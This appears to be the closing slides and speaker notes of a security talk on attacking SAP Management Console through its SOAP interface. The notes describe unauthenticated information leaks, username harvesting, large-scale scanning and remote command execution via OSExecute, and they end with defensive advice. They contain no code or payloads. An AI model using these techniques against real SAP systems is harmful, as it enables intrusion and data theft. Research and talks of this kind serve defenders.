  • 128. Thanks for coming http://c22.cc contact@c22.cc
  • 129. Sorry for sucking so bad! http://c22.cc contact@c22.cc

Editor's Notes

  1. Yeah… I said that!SAP is a perfect goal for attackers. All the companies crown jewels in once place!
  2. In 2010 SAP released more than 900 fixes… SAP is a complex product, and complex products always have flaws. Research into coding flaws show 15-50 bugs per 1000 lines of delivered code… not all are security related, but that’s still a lot of bugs!
  3. It’s not ALL SAPs fault… complex configurations user error maintaining backwards compatibilitytake your pick. In offering so much SAP are their own worst enemy.
  4. If security never see it, how can they secure itMore importantly, if they don‘t understand it, how can they ever hope to secure it!
  5. Think aboutTHAT logic for a second!I‘m pretty sure every security professional has heard that at one point or another
  6. So what’s this SOAP thing then
  7. Not a cleaning product!We‘ll be use it to scrub SAP clean howeverI‘m sure lots of you have heard of Web ServicesSimply XML over HTTP or HTTPSFlexible (can run over SMTP...)SO HOW DOES SOAP FIT INTO OUR SAP TOPIC
  8. Not a cleaning product!We‘ll be use it to scrub SAP clean howeverI‘m sure lots of you have heard of Web ServicesSimply XML over HTTP or HTTPSFlexible (can run over SMTP...)SO HOW DOES SOAP FIT INTO OUR SAP TOPIC
  9. Yes it’s a sad sad world!SAP MC uses a range of unauthenticated requests, but some of the more fun functions require username/password authentication
  10. Lots of cool dataLots of cool functionsLots of fun to be had!
  11. There’s pages of this stuff… much too much for a slide… and much too much to make this stuff available for attackers!
  12. dbms_typeThe database interface recognizes the type of the database system by the environment variable dbms_type.Possible values: ora, inf, db2, db4, db6, ada, mssOLDER VERSIONS of SAP can include environment variables such as MSSQL_USER
  13. Effect of password policies on keyspace reduction openwallDifferent password compliance rules can reduce the overall keyspace considerably!
  14. Lots of cool dataLots of cool functionsLots of fun to be had!
  15. Lots of cool dataLots of cool functionsLots of fun to be had!
  16. Lots of cool dataLots of cool functionsLots of fun to be had!
  17. Lots of cool dataLots of cool functionsLots of fun to be had!
  18. Lots of cool dataLots of cool functionsLots of fun to be had!
  19. Lots of cool dataLots of cool functionsLots of fun to be had!
  20. So I scanned a small country!
  21. What do we have already- Full server environment Version info SAP SIDDatabase info valid SAP usernames trace and debug logs
  22. Wait... SSL will save us!
  23. Yep.. It’s a feature remember? But we’ve already covered how we could get that
  24. dbms_typeThe database interface recognizes the type of the database system by the environment variable dbms_type.Possible values: ora, inf, db2, db4, db6, ada, mssOLDER VERSIONS of SAP can include environment variables such as MSSQL_USER
  25. Yep.. It’s a feature remember? But we’ve already covered how we could get that
  26. OSExecute is all well and good...Run a single commandGet the response..
  27. Block itFilter itRestrict it to administratorsYES this means internally as well!
  28. Block itFilter itRestrict it to administratorsYES this means internally as well!
  29. Block itFilter itRestrict it to administratorsYES this means internally as well!
  30. Block itFilter itRestrict it to administratorsYES this means internally as well!
  31. Block itFilter itRestrict it to administratorsYES this means internally as well!
  32. Block itFilter itRestrict it to administratorsYES this means internally as well!
  33. Block itFilter itRestrict it to administratorsYES this means internally as well!